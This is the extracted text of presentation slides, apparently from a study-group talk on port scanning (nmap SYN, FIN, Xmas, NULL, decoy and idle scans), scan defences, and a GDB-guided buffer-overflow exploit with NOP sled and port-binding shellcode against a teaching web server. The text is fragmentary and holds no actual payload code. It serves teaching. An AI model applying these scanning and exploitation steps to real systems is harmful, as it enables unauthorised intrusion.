Port Scanning 0x470~0x480 Presenter SangDuk Seo 1

Motivation 2

/ 24 Network Address = ZIP- CODE Host Address = Office Address What is Port ?

Motivation 4 Port = Windows :80 / 24 THIS IS PORT Scanning

What is Port Scanning? 5 Way of figuring out which ports are listening and accepting connections. Port scanning can find vulnerabilities in Server NMAP – Most popular open source port-scanning tools. nmap [-main option] [-sub option] [main option] sT – Full connection sS – Syn half sA – Ack Scan sI- Idle Scan D – Decoy Scan sU – UDP Scan sN – NULL Scan sX – Xmas Scan sF – FIN Scan d –show detail [sub option] sV - Identify Port application O – Identify OS oA - Save result p - Select Target [result] Open Filtered – cannot access port (firewall) Closed

Full Connection Scanning 6 Trying to open TCP connections to every possible port on the target system – Effective but noisy and detectable Attacke r Victim Open on target Attacke r Victim Closed on target

Full Connection Scanning 7 Nmap -sT

Stealth SYN Scan 8 Half- Open Scan - It doesn’t actually open a full TCP connection. RST packet is sent to tear down the connection to prevent the service from accidentally being DoSed. Attacke r Victim Open on target RST Attacke r Victim Closed on target

Stealth SYN Scan 9 Nmap -sS

FIN, X-mas, NULL Scan 10 These all involve sending a nonsensical packet to every port on the target system. If the port is closed and the implementation follows protocol (RFC 793), an RST packet will be sent Attacke r Victim Open on target Attacke r Victim Closed on target Nothing

FIN, X-mas, NULL Scan 11 Nmap –sF Nmap –sX Nmap -sN Failed

FIN, X-mas, NULL Scan add on -d Option 12 Failed

Spoofing Decoys 13 Spoofs connections from various decoy IP addresses in between each real port-scanning connection Spoofed decoy addresses must use real IP addresses of live hosts - the target may be accidentally SYN flooded.

Spoofing Decoys 14 Nmap –D

Idle Scanning 15 Scan a target using spoofed packets from an idle host, by observing changes in the idle host Find a usable idle host that is not sending or receiving any other network traffic TCP implementation that produces predictable IP IDs that change by a known increment with each packet. IP IDs are meant to be unique per packet per session, and they are commonly incremented by 1 or 254 (depending on byte ordering) on Windows 95 and 2000 Recent Linux kernel, OpenBSD, and Windows Vista using randomize the IP ID -> It didn’t Work NOW

Idle Scanning 16 1.Get the current IP ID 2.Identify the increment of IP ID 3.Send a spoofed SYN packet with the idle host’s IP address to a port on the target machine ID = ID+1 if the idle host isn't truly idle, the results will be skewed

Idle Scanning 17 Nmap -sI

Proactive Defense (Shroud) – Close Port 18 Close Ports what we don’t use fuser -n tcp [port], kill -9 [pid] iptables -A INPUT -p udp --dport j DROP

Proactive Defense (Shroud) – NO RST 19 FIN, Null, and X-mas scans can be prevented by a simple kernel modification If the kernel never sends reset packets, these scans will turn up nothing Return; YOU HAVE TO recompile kernel

Proactive Defense (Shroud) – NO RST 20 Attacke r Victim Open on target Attacke r Victim Closed on target Nothing

Proactive Defense (Shroud) 21

Proactive Defense (Shroud) – Full & Half Scan 22 Make sea of false positives. –Attacker can’t find what port is really open. Source -> Pretend to Destination Destination -> Return to Source Pretend all Ports are OPEN

Proactive Defense (Shroud) – Full & Half Scan 23 Make sea of false positives.

Proactive Defense (Shroud) 24 Sometimes it did not work..

Reach Out and Hack Someone 25 There is no code to limit the length. Ref)

Analysis with GDB 26 Compile with –g option to debug Run and find tinyweb’s PID Use GDB and Attach to the process after it’s already running

Why Doing like that? 27 Tinyweb requires root privileges, so the debugger must be run as root (Application that using 1~1024 port requires root privileges) Using sudo or running with root’s environment will change the stack The addresses seen in the debugger’s run of the binary won’t match the addresses when it’s running normally Sudo gdb./tinyweb Grep Pid

Analysis with GDB 28 Break We know this function has Vulnerability

Analysis with GDB 29 Breaking We will insert shell code there Let’s Find that Return Address

Analysis with GDB 30 0 Return = 0xbfff7b(4 + 8) = c Request’s Buffer Space = 540byte +200 for Avoid Buffer Start Point 0xbffff668 is return Address

Almost Only Counts with Hand Grenades 31 Change RetADDR Vim./tinyweb_exploit.c

Almost Only Counts with Hand Grenades 32 Attacker’s Terminal NOP sled Shell Code Victim’s Terminal We aren’t at the console, So this won’t do us any good!

Port-Binding Shellcode 33 Count Words Cut Address Add “/x “ and delete null Space Shell code for Binding Port

Port-Binding Shellcode 34 works like that cat program but over the network

Port-Binding Shellcode 35 Count words NOP Sled Rest / Return ADDR Size

Port-Binding Shellcode

QnA 37

38